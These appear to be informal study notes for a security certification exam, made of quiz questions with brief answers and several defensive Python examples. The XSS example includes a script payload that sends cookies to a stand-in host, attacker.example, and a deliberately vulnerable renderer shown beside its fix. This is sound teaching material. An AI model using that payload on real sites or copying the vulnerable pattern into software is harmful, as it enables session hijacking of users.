This article is literally just copy-pasted from my own notes; please feel free to browse for now, but this will be edited soon.

DRP = Disaster Recovery Plan
Port scans = Active recon


If the username keeps changing but the password stays the same, it's password spraying (one common password tried across many accounts, which stays under per-account lockout thresholds). The reverse, many passwords against one username, is brute force.
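The rule above turned into detection logic, as an added example that is not part of the original notes. The log format ("timestamp username result source_ip") and the sample lines are constructed for illustration; the discriminator is how many distinct usernames a single source fails against inside a short window.

```python
"""Distinguish password spraying from brute force in authentication logs.

Added example (not from the original notes). Log format is constructed:
    <ISO timestamp> <username> <FAIL|SUCCESS> <source_ip>
Spraying:     one or a few guesses rotated across MANY accounts.
Brute force:  many guesses hammering ONE account.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not real data).
SAMPLE_LOG = """\
2024-03-01T09:00:01 alice FAIL 203.0.113.10
2024-03-01T09:00:02 bob FAIL 203.0.113.10
2024-03-01T09:00:03 carol FAIL 203.0.113.10
2024-03-01T09:00:04 dave FAIL 203.0.113.10
2024-03-01T09:00:05 erin FAIL 203.0.113.10
2024-03-01T09:00:06 frank SUCCESS 203.0.113.10
2024-03-01T09:05:00 mallory FAIL 198.51.100.7
2024-03-01T09:05:01 mallory FAIL 198.51.100.7
2024-03-01T09:05:02 mallory FAIL 198.51.100.7
2024-03-01T09:05:03 mallory FAIL 198.51.100.7
2024-03-01T09:05:04 mallory FAIL 198.51.100.7
2024-03-01T10:00:00 alice SUCCESS 192.0.2.5
"""


def parse(line):
    ts, user, result, ip = line.split()
    return datetime.fromisoformat(ts), user, result, ip


def classify(log_text, window=timedelta(minutes=10), threshold=5):
    """Return {source_ip: "spray" | "brute_force"} for every source that
    produced at least `threshold` failures inside `window`.

    Spraying rotates usernames, so the count of distinct accounts in the
    window is high; brute force concentrates on one account."""
    failures = defaultdict(list)  # source_ip -> [(timestamp, username)]
    for line in log_text.strip().splitlines():
        ts, user, result, ip = parse(line)
        if result == "FAIL":
            failures[ip].append((ts, user))

    verdicts = {}
    for ip, fails in failures.items():
        fails.sort()
        start = 0
        # Sliding window over this source's failures, oldest to newest.
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            in_window = fails[start:end + 1]
            if len(in_window) >= threshold:
                distinct_users = {user for _, user in in_window}
                # At least half the attempts (and at least two) hit different
                # accounts -> the attacker is rotating usernames.
                if len(distinct_users) >= max(2, len(in_window) // 2):
                    verdicts[ip] = "spray"
                else:
                    verdicts[ip] = "brute_force"
                break
    return verdicts


if __name__ == "__main__":
    # {'203.0.113.10': 'spray', '198.51.100.7': 'brute_force'}
    print(classify(SAMPLE_LOG))
```

In a SIEM the same idea is a "distinct username count per source IP over N minutes" aggregation; the SUCCESS for frank right after the spray run from the same source is the event to escalate first, since it is the account the sprayed password matched.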


An analyst is evaluating the implementation of Zero Trust principles within the data plane. Which of the following would be most relevant for the analyst to evaluate?
SUBJECT ROLE


A company needs to provide administrative access to internal resources while minimizing the traffic allowed through the security boundary. Which of the following methods is most secure?
BASTION HOST
A bastion host is a hardened server on a perimeter network (also known as a DMZ) that is designed to withstand attacks and exposes only the administrative service (e.g., SSH) needed to reach internal resources.


A security analyst is reviewing alerts in the SIEM related to potential malicious network traffic coming from an employee’s corporate laptop. The security analyst has determined that additional data about the executable running on the machine is necessary to continue the investigation. Which of the following logs should the analyst use as a data source?
ENDPOINT
because the employee's laptop is an endpoint, and endpoint (host/EDR) logs are what record which executable ran and what it did.


A company purchased cyber insurance to address items listed on the risk register. Which of the following strategies does this represent?
TRANSFER
Transferring risk to insurance provider


Which of the following is the most likely to be used to document risks, responsible parties, and thresholds?
RISK REGISTER
Like a registry of risks lol


Which of the following should a security administrator adhere to when setting up a new set of firewall rules?
CHANGE MANAGEMENT PROCEDURE


A client asked a security company to provide a document outlining the project, the cost, and the completion time frame. Which of the following documents should the company provide to the client?
SOW (statement of work)


Input validation for XSS vulns (exam answer; in practice pair it with context-aware output encoding, which is the primary XSS defense, and treat validation as defense in depth).
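The vulnerable pattern beside its hardened form, as an added example that is not part of the original notes. The payload, the page template and the helper names (render_vulnerable, render_hardened, handle_request) are hypothetical; the point is allow-list validation on the way in plus HTML encoding on the way out.

```python
"""Reflected XSS: raw interpolation vs. validation + output encoding.

Added example (not from the original notes). Helper names and the page
template are hypothetical; PAYLOAD is a constructed attacker input such as
a ?name= query parameter.
"""
import html
import re

# Constructed attacker-controlled input.
PAYLOAD = ('<script>document.location="https://attacker.example/?c="'
           '+document.cookie</script>')

# Allow-list for a username field: letters, digits, _ . - up to 32 chars.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def render_vulnerable(name: str) -> str:
    # Untrusted data dropped straight into the HTML body: the browser
    # parses and executes the injected <script>.
    return f"<p>Hello, {name}!</p>"


def is_valid_username(name: str) -> bool:
    """Allow-list input validation: accept only what a username can look
    like, instead of trying to strip 'bad' characters (deny-lists miss
    encodings and variants)."""
    return USERNAME_RE.fullmatch(name) is not None


def render_hardened(name: str) -> str:
    # Output encoding for the HTML-body context: & < > " ' become entities,
    # so the payload is displayed as text rather than parsed as markup.
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def handle_request(name: str) -> str:
    """Defense in depth: validate on the way in, encode on the way out."""
    if not is_valid_username(name):
        raise ValueError("invalid username")
    return render_hardened(name)


def contains_script_tag(markup: str) -> bool:
    """Crude check, used only to show the difference between the renderers."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))   # live <script> tag in the response
    print(render_hardened(PAYLOAD))     # &lt;script&gt;... shown as text
    print(handle_request("alice_01"))   # <p>Hello, alice_01!</p>
    try:
        handle_request(PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)         # validation stops it before rendering
```

html.escape is the right encoder only for HTML body and quoted attribute values; data placed inside a script block, a URL or a CSS value needs the encoder for that context, which is why encoding has to be chosen per output location rather than applied once at input.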


A technician needs to apply a high-priority patch to a production system. Which of the following steps should be taken first?
change control request


Which of the following is the most likely outcome if a large bank fails an internal PCI DSS compliance assessment?
Audit Findings
Keyword is internal: a failed internal assessment produces audit findings to remediate; failing an external assessment is what could lead to fines.


An organization is building a new backup data center with cost-benefit as the primary requirement and RTO and RPO values around two days. Which of the following types of sites is the best for this scenario?
WARM SITE

RTO/RPO of around two days matches a warm site's recovery time of a few days, at lower cost than a hot site.

Warm Sites
● Not fully equipped, but fundamentals in place
● Can be up and running within a few days
● Cheaper than hot sites but with a slight delay

Cold Sites
● Fewer facilities than warm sites
● May be just an empty building, ready in 1-2 months
● Cost-effective but adds more recovery time


A systems administrator works for a local hospital and needs to ensure patient data is protected and secure. Which of the following data classifications should be used to secure patient data?
Sensitive


Which of the following allows for the attribution of messages to individuals?
Non-Repudiation


Which of the following is the best way to consistently determine on a daily basis whether security settings on servers have been modified?
Automation


Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer’s PII?
DLP


Which of the following has been implemented when a host-based firewall on a legacy Linux system allows connections from only specific internal IP addresses?
Compensating Control


A systems administrator is looking for a low-cost application-hosting solution that is cloud-based. Which of the following meets these requirements?
Serverless Framework


ARO = annualized rate of occurrence (expected number of times the event happens per year; ALE = SLE × ARO)


A security administrator needs a method to secure data in an environment that includes some form of check to track any changes. Which of the following should the administrator set up to achieve this goal?
FIM (file integrity monitoring): baseline hashes of files, then alert on any difference
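A minimal FIM cycle, as an added example that is not part of the original notes: hash every file under a directory, take a baseline, then diff a later snapshot into modified, added and removed paths. The directory tree, file contents and the tampering are constructed in a temporary directory so the example runs anywhere.

```python
"""Minimal file integrity monitoring: baseline hashes, then detect changes.

Added example (not from the original notes). The file tree and the
tampering are constructed in a temp directory. A real FIM stores the
baseline where the monitored host cannot alter it and alerts on the diff.
"""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List


def sha256_file(path: Path, chunk: int = 65536) -> str:
    """Stream the file so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def baseline(root: Path) -> Dict[str, str]:
    """Map relative POSIX path -> SHA-256 for every regular file under root."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def compare(old: Dict[str, str], new: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify differences between two snapshots."""
    common = old.keys() & new.keys()
    return {
        "modified": sorted(k for k in common if old[k] != new[k]),
        "added": sorted(new.keys() - old.keys()),
        "removed": sorted(old.keys() - new.keys()),
    }


def demo() -> Dict[str, List[str]]:
    """Build a constructed tree, snapshot it, tamper with it, diff it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "etc").mkdir()
        (root / "etc" / "sshd_config").write_text("PermitRootLogin no\n")
        (root / "etc" / "passwd").write_text("root:x:0:0::/root:/bin/bash\n")
        (root / "bin").mkdir()
        (root / "bin" / "ls").write_bytes(b"\x7fELF original")
        before = baseline(root)

        # Simulated tampering: config weakened, binary replaced,
        # persistence dropped in cron, a file deleted.
        (root / "etc" / "sshd_config").write_text("PermitRootLogin yes\n")
        (root / "bin" / "ls").write_bytes(b"\x7fELF backdoored")
        (root / "etc" / "cron.d").mkdir()
        (root / "etc" / "cron.d" / "persist").write_text("* * * * * root /tmp/x\n")
        (root / "etc" / "passwd").unlink()
        after = baseline(root)

        return compare(before, after)


if __name__ == "__main__":
    print(demo())
```

Hashing content catches a trojaned binary even when size and timestamps are preserved; production tools also record ownership and permission bits, since a mode change on a sensitive file is a finding in itself.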


A security engineer is implementing FDE for all laptops in an organization. Which of the following are the most important for the engineer to consider as part of the planning process? (Choose two.)

A. Key escrow
B. TPM presence

Key escrow: This is important to ensure that encryption keys can be recovered in case they are lost or forgotten. It is a crucial consideration for Full Disk Encryption (FDE) to maintain access to data even if issues arise with the primary encryption keys.

TPM presence: Trusted Platform Module (TPM) is a hardware-based security feature that can store encryption keys securely. Ensuring the presence of a TPM on laptops enhances the security of FDE by protecting the encryption keys from being accessed or tampered with.


A security analyst scans a company’s public network and discovers a host is running a remote desktop that can be used to access the production network. Which of the following changes should the security analyst recommend?
Setting up a VPN and placing the jump server inside the firewall, so the remote desktop is no longer reachable from the public network


An enterprise has been experiencing attacks focused on exploiting vulnerabilities in older browser versions with well-known exploits. Which of the following security solutions should be configured to best provide the ability to monitor and block these known signature-based attacks?
IPS
IPS (Intrusion Prevention System): Monitors and controls network and system activities to protect against malicious activities by detecting and preventing attacks in real-time. An IPS can block traffic that matches known attack signatures.


A technician is opening ports on a firewall for a new system being deployed and supported by a SaaS provider. Which of the following is a risk in the new system?
Supply chain (vendor) risk


Which of the following is used to validate a certificate when it is presented to a user?
OCSP (Online Certificate Status Protocol): a real-time revocation check against the CA's responder


A security consultant needs secure, remote access to a client environment. Which of the following should the security consultant most likely use to gain access?
IPSec (VPN)


Which of the following should a systems administrator use to ensure an easy deployment of resources within the cloud provider?
Infrastructure as code


Which of the following practices would be best to prevent an insider from introducing malicious code into a company’s development process?
Peer review and approval


Earthquake-prone area, protecting against data loss
Off-site replication (to a geographically separate location)


Legacy IoT devices with access vulnerabilities
Segmentation


After an audit finds confidential data exposed and access must be restricted quickly
Access control lists


Storage array for classified data: what should the company request from the vendor?
Certification


An organization would like to store customer data on a separate part of the network that is not accessible to users on the main corporate network. Which of the following should the administrator use to accomplish this goal?
Segmentation


Which of the following is the most common data loss path for an air-gapped network?
Removable devices


An organization is struggling with scaling issues on its VPN concentrator and internet circuit due to remote work. The organization is looking for a software solution that will allow it to reduce traffic on the VPN and internet circuit, while still providing encrypted tunnel access to the data center and monitoring of remote employee internet traffic. Which of the following will help achieve these objectives?
Deploying a SASE solution to remote employees


EMAIL ORIGINATION AUTHORIZATION (which mail may claim to come from your domain)
DMARC. It builds on SPF and DKIM: whichever of the two passed must be aligned with the visible From domain, then the domain owner's published policy (none/quarantine/reject) and reporting apply.
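DMARC's parse-and-align step worked through, as an added example that is not part of the original notes. The DMARC record, the message domains and the SPF/DKIM results are constructed; the organizational-domain helper (keep the last two labels) is a simplification I am assuming here, where real receivers consult the Public Suffix List.

```python
"""DMARC: parse a policy record and apply the identifier alignment check.

Added example (not from the original notes). The record and the message
inputs are constructed. org_domain() is a simplification (assumption):
real implementations use the Public Suffix List.
"""
from typing import Dict, Optional


def parse_dmarc(txt: str) -> Dict[str, str]:
    """'v=DMARC1; p=reject; adkim=s' -> {'v': 'DMARC1', 'p': 'reject', ...}"""
    tags: Dict[str, str] = {}
    for part in txt.split(";"):
        part = part.strip()
        if not part:
            continue
        key, _, value = part.partition("=")
        tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1" or "p" not in tags:
        raise ValueError("not a valid DMARC record")
    # Alignment modes default to relaxed when the tags are absent.
    tags.setdefault("adkim", "r")
    tags.setdefault("aspf", "r")
    return tags


def org_domain(domain: str) -> str:
    # Assumption for the example: organizational domain = last two labels.
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(from_domain: str, auth_domain: str, mode: str) -> bool:
    """Strict ('s'): exact match. Relaxed ('r'): same organizational domain."""
    if mode == "s":
        return from_domain.lower() == auth_domain.lower()
    return org_domain(from_domain) == org_domain(auth_domain)


def evaluate(record: Dict[str, str], from_domain: str,
             spf_pass_domain: Optional[str],
             dkim_pass_domain: Optional[str]) -> str:
    """Return 'pass' or the record's p= disposition.

    DMARC passes if EITHER an SPF pass OR a DKIM pass is aligned with the
    RFC5322.From domain. SPF alone authenticates the envelope sender and
    DKIM alone the signing domain; the alignment step is what ties them to
    the address the user actually sees.
    """
    spf_ok = (spf_pass_domain is not None
              and aligned(from_domain, spf_pass_domain, record["aspf"]))
    dkim_ok = (dkim_pass_domain is not None
               and aligned(from_domain, dkim_pass_domain, record["adkim"]))
    return "pass" if (spf_ok or dkim_ok) else record["p"]


# Constructed record for example.com: strict DKIM, relaxed SPF, reject policy.
RECORD = parse_dmarc(
    "v=DMARC1; p=reject; adkim=s; aspf=r; rua=mailto:dmarc@example.com")

if __name__ == "__main__":
    # Legitimate: SPF passed for bounce domain mail.example.com (relaxed OK).
    print(evaluate(RECORD, "example.com", "mail.example.com", None))  # pass
    # Spoof: attacker's own SPF/DKIM pass, but for attacker.example.
    print(evaluate(RECORD, "example.com",
                   "attacker.example", "attacker.example"))            # reject
    # DKIM signed by a subdomain; adkim=s demands an exact match.
    print(evaluate(RECORD, "example.com", None, "news.example.com"))  # reject
```

The third case is the usual way legitimate mail breaks when a domain owner tightens adkim to strict: a marketing or ticketing system signs with a subdomain that no longer aligns, and the p=reject policy drops it. Roll out with p=none and read the rua reports before moving to quarantine or reject.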


Logging in with existing credentials from a third-party site is federation, NOT SSO.


Memorandum of Agreement (MOA): An MOA is a document written between parties to cooperatively work together on an agreed upon project or meet an agreed upon objective.